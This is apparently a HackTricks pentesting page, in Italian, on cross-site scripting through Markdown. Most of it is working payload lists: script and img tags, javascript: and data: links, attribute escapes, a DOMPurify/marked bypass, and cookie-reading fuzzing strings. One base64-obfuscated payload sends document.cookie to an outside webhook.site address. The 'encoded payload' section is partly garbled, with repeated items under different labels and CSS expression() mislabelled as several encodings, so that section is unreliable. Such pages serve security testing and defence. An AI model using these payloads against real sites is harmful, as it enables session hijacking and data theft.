XSS in Markdown

Impara l'hacking di AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)!

Se hai la possibilità di iniettare codice in markdown, ci sono alcune opzioni che puoi utilizzare per attivare un XSS quando il codice viene interpretato.

Tag HTML

Il modo più comune per ottenere un XSS in markdown è iniettare tag HTML comuni che eseguono javascript, perché diversi interpreti di markdown accetteranno anche HTML.

<!-- XSS with regular tags -->
<script>alert(1)</script>
<img src=x onerror=alert(1) />

Puoi trovare ulteriori esempi nella pagina principale di XSS di hacktricks.

Se i tag HTML non sono un'opzione, puoi sempre provare a giocare con la sintassi del markdown:

<!-- markdow link to XSS, this usually always work but it requires interaction -->
[a](javascript:prompt(document.cookie))

<!-- Other links attacks with some bypasses -->
[Basic](javascript:alert('Basic'))
[Local Storage](javascript:alert(JSON.stringify(localStorage)))
[CaseInsensitive](JaVaScRiPt:alert('CaseInsensitive'))
[URL](javascript://www.google.com%0Aalert('URL'))
[In Quotes]('javascript:alert("InQuotes")')
[a](j a v a s c r i p t:prompt(document.cookie))
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](javascript:window.onerror=alert;throw%201)

Abuso della sintassi dell'evento Img

L'abuso della sintassi dell'evento Img è una tecnica comune utilizzata per eseguire attacchi di cross-site scripting (XSS). Questa tecnica sfrutta la possibilità di inserire codice JavaScript all'interno dell'attributo onerror di un elemento <img>. Quando l'immagine non viene caricata correttamente, il codice JavaScript viene eseguito nel contesto del sito web ospitante, consentendo all'attaccante di eseguire azioni dannose.

Ecco un esempio di come viene utilizzata questa tecnica:

[![Immagine](https://example.com/image.jpg" onerror="alert('XSS')")](https://example.com)

In questo esempio, l'attributo onerror viene utilizzato per inserire il codice JavaScript alert('XSS'). Quando l'immagine non viene caricata correttamente, viene visualizzato un popup con il messaggio "XSS".

Gli attaccanti possono sfruttare questa tecnica per rubare informazioni sensibili, eseguire azioni dannose o compromettere la sicurezza del sito web. Per mitigare questo tipo di attacco, è importante validare e filtrare correttamente i dati di input e utilizzare tecniche di sanitizzazione per evitare l'esecuzione di codice JavaScript non autorizzato.

![Uh oh...]("onerror="alert('XSS'))
![Uh oh...](https://www.example.com/image.png"onload="alert('XSS'))
![Escape SRC - onload](https://www.example.com/image.png"onload="alert('ImageOnLoad'))
![Escape SRC - onerror]("onerror="alert('ImageOnError'))

Bypass del Markdown del Sanitizzatore HTML

Il seguente codice sta sanitizzando l'input HTML e poi passandolo al parser Markdown, quindi, è possibile attivare XSS sfruttando le interpretazioni errate tra Markdown e DOMPurify

<!--from https://infosecwriteups.com/clique-writeup-%C3%A5ngstromctf-2022-e7ae871eaa0e -->
<script src="https://cdn.jsdelivr.net/npm/dompurify@2.3.6/dist/purify.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/marked@4.0.14/lib/marked.umd.min.js"></script>
<script>
const qs = new URLSearchParams(location.search);
if (qs.get("content")?.length > 0) {
document.body.innerHTML = marked.parse(DOMPurify.sanitize(qs.get("content")));
}
</script>

Esempi di payload:

  1. Payload di base:

<script>alert('XSS')</script>
  1. Payload con codifica HTML:

&lt;script&gt;alert('XSS')&lt;/script&gt;
  1. Payload con codifica URL:

%3Cscript%3Ealert('XSS')%3C/script%3E
  1. Payload con codifica JavaScript:

%3Cscript%3Ealert(%27XSS%27)%3C/script%3E
  1. Payload con codifica HTML e JavaScript:

&#x3C;script&#x3E;alert('XSS')&#x3C;/script&#x3E;
  1. Payload con codifica CSS:

expression(alert('XSS'))
  1. Payload con codifica HTML e CSS:

exp&#x72;ession(alert('XSS'))
  1. Payload con codifica HTML, CSS e JavaScript:

exp&#x72;ession&#x28;alert('XSS')&#x29;
  1. Payload con codifica HTML, CSS, JavaScript e URL:

exp&#x72;ession&#x28;ale&#x72;t(%27XSS%27)&#x29;
  1. Payload con codifica HTML, CSS, JavaScript, URL e Unicode:

exp&#x72;ession&#x28;ale&#x72;t(%27XSS%27)&#x29;
  1. Payload con codifica HTML, CSS, JavaScript, URL, Unicode e base64:

e&#x78;pression(atob(%27YWxlcnQoJ1hTUycpJw==%27))
  1. Payload con codifica HTML, CSS, JavaScript, URL, Unicode, base64 e commenti:

e&#x78;pression(atob(%27YWxlcnQoJ1hTUycpJw==%27))//'
  1. Payload con codifica HTML, CSS, JavaScript, URL, Unicode, base64, commenti e tag HTML:

e&#x78;pression(atob(%27YWxlcnQoJ1hTUycpJw==%27))//'</script><script>alert('XSS')</script>
<div id="1

![](contenteditable/autofocus/onfocus=confirm('qwq')//)">
-----------------------------------------------
<a title="a

<img src=x onerror=alert(1)>">yep</a>
------------------------------------------------
[x](y '<style>')<!--</style><div id="x--><img src=1 onerror=alert(1)>"></div>
----------------------------------------------
[<p x='<style onload=eval(atob(/bG9jYXRpb249YGh0dHBzOi8vd2ViaG9vay5zaXRlL2FiM2IyYjg5LTg1YTktNGU0YS1hNjg0LTUxN2M1ZjQwNmZmMj9mPWArZW5jb2RlVVJJQ29tcG9uZW50KGRvY3VtZW50LmNvb2tpZSk/.source))>](#'></p>)
----------------------------------------------
`<p x="`<img src=x onerror=alert(1)>"></p>

Fuzzing

Il fuzzing è una tecnica di test che consiste nell'inviare dati casuali o semi-casuali a un'applicazione al fine di individuare eventuali vulnerabilità. Questo può essere fatto inviando input non validi o inaspettati per verificare come l'applicazione gestisce tali dati. Il fuzzing può essere utilizzato per individuare vulnerabilità come buffer overflow, XSS (Cross-Site Scripting) e SQL injection.

<!--
Fuzzing examples from
- https://github.com/cujanovic/Markdown-XSS-Payloads/blob/master/Markdown-XSS-Payloads.txt
- https://makandracards.com/makandra/481451-testing-for-xss-in-markdown-fields
-->

[a](javascript:prompt(document.cookie))
[a](j    a   v   a   s   c   r   i   p   t:prompt(document.cookie))
![a](javascript:prompt(document.cookie))\
<javascript:prompt(document.cookie)>
<&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29)
![a'"`onerror=prompt(document.cookie)](x)\
[citelol]: (javascript:prompt(document.cookie))
[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)
[test](javascript://%0d%0aprompt(1))
[test](javascript://%0d%0aprompt(1);com)
[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)
[notmalicious](javascript://%0d%0awindow.onerror=alert;throw%20document.cookie)
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[clickme](vbscript:alert(document.domain))
_http://danlec_@.1 style=background-image:url();background-repeat:no-repeat;display:block;width:100%;height:100px; onclick=alert(unescape(/Oh%20No!/.source));return(false);//
<http://\<meta\ http-equiv=\"refresh\"\ content=\"0;\ url=http://danlec.com/\"\>>
[text](http://danlec.com " [@danlec](/danlec) ")
[a](javascript:this;alert(1))
[a](javascript:this;alert(1&#41;)
[a](javascript&#58this;alert(1&#41;)
[a](Javas&#99;ript:alert(1&#41;)
[a](Javas%26%2399;ript:alert(1&#41;)
[a](javascript:alert&#65534;(1&#41;)
[a](javascript:confirm(1)
[a](javascript://www.google.com%0Aprompt(1))
[a](javascript://%0d%0aconfirm(1);com)
[a](javascript:window.onerror=confirm;throw%201)
[a](javascript:alert(document.domain&#41;)
[a](javascript://www.google.com%0Aalert(1))
[a]('javascript:alert("1")')
[a](JaVaScRiPt:alert(1))
![a](https://www.google.com/image.png"onload="alert(1))
![a]("onerror="alert(1))
</http://<?php\><\h1\><script:script>confirm(2)
[XSS](.alert(1);)
[ ](https://a.de?p=[[/data-x=. style=background-color:#000000;z-index:999;width:100%;position:fixed;top:0;left:0;right:0;bottom:0; data-y=.]])
[ ](http://a?p=[[/onclick=alert(0) .]])
[a](javascript:new%20Function`al\ert\`1\``;)
[XSS](javascript:prompt(document.cookie))
[X
[XSS](&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x27;&#x58;&#x53;&#x53;&#x27;&#x29;)
[XSS]: (javascript:prompt(document.cookie))
[XSS](javascript:window.onerror=alert;throw%20document.cookie)
[XSS](javascript://%0d%0aprompt(1))
[XSS](javascript://%0d%0aprompt(1);com)
[XSS](javascript:window.onerror=alert;throw%20document.cookie)
[XSS](javascript://%0d%0awindow.onerror=alert;throw%20document.cookie)
[XSS](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[XSS](vbscript:alert(document.domain))
[XSS](javascript:this;alert(1))
[XSS](javascript:this;alert(1&#41;)
[XSS](javascript&#58this;alert(1&#41;)
[XSS](Javas&#99;ript:alert(1&#41;)
[XSS](Javas%26%2399;ript:alert(1&#41;)
[XSS](javascript:alert&#65534;(1&#41;)
[XSS](javascript:confirm(1)
[XSS](javascript://%0d%0aconfirm(1);com)
[XSS](javascript:window.onerror=confirm;throw%201)
[XSS](�javascript:alert(document.domain&#41;)
![XSS](javascript:prompt(document.cookie))\
![XSS](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\
![XSS'"`onerror=prompt(document.cookie)](x)\
Impara l'hacking di AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)!

Last updated